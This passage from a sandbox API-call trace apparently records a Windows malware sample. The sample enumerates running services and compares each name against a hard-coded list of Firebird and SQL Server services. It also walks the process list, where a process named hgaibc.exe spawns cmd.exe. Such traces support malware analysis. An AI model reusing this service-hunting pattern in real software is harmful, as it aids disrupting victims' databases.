(lpString1="mssqlserver", lpString2="Schedule") returned -1 [0181.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0181.556] lstrlenW (lpString="SecurityHealthService") returned 21 [0181.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0181.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0181.556] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0181.556] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0181.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0181.556] lstrlenW (lpString="SENS") returned 4 [0181.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0181.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0181.556] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0181.556] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0181.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0181.556] lstrlenW (lpString="ShellHWDetection") returned 16 [0181.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0181.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0181.556] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0181.556] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0181.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0181.556] lstrlenW (lpString="Spooler") returned 7 [0181.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0181.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0181.557] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0181.557] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0181.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0181.557] lstrlenW (lpString="StateRepository") returned 15 [0181.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0181.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0181.557] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0181.557] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0181.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0181.557] lstrlenW (lpString="SysMain") returned 7 [0181.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0181.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0181.557] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0181.557] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0181.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0181.557] lstrlenW (lpString="SystemEventsBroker") returned 18 [0181.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0181.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0181.557] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0181.557] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0181.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0181.557] lstrlenW (lpString="Themes") returned 6 [0181.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0181.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0181.557] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0181.557] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0181.557] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0181.557] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0181.557] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0181.557] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0181.557] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0181.558] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0181.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x7719f8 | out: hHeap=0x680000) returned 1 [0181.558] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x384 [0182.235] Process32FirstW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.236] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.237] lstrlenW (lpString="System") returned 6 [0182.237] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.237] lstrlenW (lpString="smss.exe") returned 8 [0182.237] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.238] lstrlenW (lpString="csrss.exe") returned 9 [0182.238] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.239] lstrlenW (lpString="wininit.exe") returned 11 [0182.239] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.279] lstrlenW (lpString="csrss.exe") returned 9 [0182.279] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.280] lstrlenW (lpString="winlogon.exe") returned 12 [0182.280] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.280] lstrlenW (lpString="services.exe") returned 12 [0182.280] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.281] lstrlenW (lpString="lsass.exe") returned 9 [0182.281] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0182.282] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0182.282] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0182.282] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0182.282] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.283] lstrlenW (lpString="svchost.exe") returned 11 [0182.283] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.284] lstrlenW (lpString="svchost.exe") returned 11 [0182.284] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0182.284] lstrlenW (lpString="dwm.exe") returned 7 [0182.284] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.285] lstrlenW (lpString="svchost.exe") returned 11 [0182.285] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.286] lstrlenW (lpString="svchost.exe") returned 11 [0182.286] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.286] lstrlenW (lpString="svchost.exe") returned 11 [0182.286] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.287] lstrlenW (lpString="svchost.exe") returned 11 [0182.287] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.288] lstrlenW (lpString="svchost.exe") returned 11 [0182.288] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.288] lstrlenW (lpString="svchost.exe") returned 11 [0182.288] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.289] lstrlenW (lpString="svchost.exe") returned 11 [0182.289] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.290] lstrlenW (lpString="svchost.exe") returned 11 [0182.290] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.290] lstrlenW (lpString="svchost.exe") returned 11 [0182.290] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.291] lstrlenW (lpString="svchost.exe") returned 11 [0182.291] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.292] lstrlenW (lpString="spoolsv.exe") returned 11 [0182.292] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.292] lstrlenW (lpString="svchost.exe") returned 11 [0182.292] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0182.293] lstrlenW (lpString="audiodg.exe") returned 11 [0182.293] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0182.294] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0182.294] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0182.294] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0182.295] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0182.295] lstrlenW (lpString="Memory Compression") returned 18 [0182.295] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0182.296] lstrlenW (lpString="sihost.exe") returned 10 [0182.296] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.297] lstrlenW (lpString="svchost.exe") returned 11 [0182.297] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0182.297] lstrlenW (lpString="msoia.exe") returned 9 [0182.297] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0182.298] lstrlenW (lpString="taskhostw.exe") returned 13 [0182.298] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.299] lstrlenW (lpString="explorer.exe") returned 12 [0182.299] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0182.299] lstrlenW (lpString="SearchUI.exe") returned 12 [0182.299] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0182.300] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0182.300] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0182.301] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0182.301] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.301] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0182.301] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0182.302] lstrlenW (lpString="hgaibc.exe") returned 10 [0182.302] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0182.303] lstrlenW (lpString="dllhost.exe") returned 11 [0182.303] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0182.303] lstrlenW (lpString="dllhost.exe") returned 11 [0182.303] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0182.304] lstrlenW (lpString="hgaibc.exe") returned 10 [0182.304] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x2a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0182.305] lstrlenW (lpString="cmd.exe") returned 7 [0182.305] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0182.305] lstrlenW (lpString="conhost.exe") returned 11 [0182.305] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0182.306] lstrlenW (lpString="cmd.exe") returned 7 [0182.306] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0182.307] lstrlenW (lpString="conhost.exe") returned 11 [0182.307] Process32NextW (in: hSnapshot=0x384, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0182.307] CloseHandle (hObject=0x384) returned 1 [0182.307] Sleep (dwMilliseconds=0x1f4) [0183.168] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bef20 [0183.168] EnumServicesStatusExW (in: hSCManager=0x6bef20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0183.169] GetLastError () returned 0xea [0183.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x772a00 [0183.169] EnumServicesStatusExW (in: hSCManager=0x6bef20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x772a00, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x772a00, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0183.170] CloseServiceHandle (hSCObject=0x6bef20) returned 1 [0183.170] lstrlenW (lpString="Appinfo") returned 7 [0183.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0183.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0183.170] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0183.170] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0183.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0183.170] lstrlenW (lpString="AppXSvc") returned 7 [0183.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0183.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0183.170] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0183.171] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0183.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0183.171] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0183.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0183.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0183.171] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0183.171] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0183.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0183.171] lstrlenW (lpString="Audiosrv") returned 8 [0183.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0183.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0183.171] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0183.171] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0183.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0183.171] lstrlenW (lpString="BFE") returned 3 [0183.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0183.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0183.171] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0183.171] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0183.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0183.171] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0183.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0183.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0183.171] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0183.171] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0183.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0183.171] lstrlenW (lpString="CDPSvc") returned 6 [0183.171] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0183.171] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0183.171] lstrcmpiW 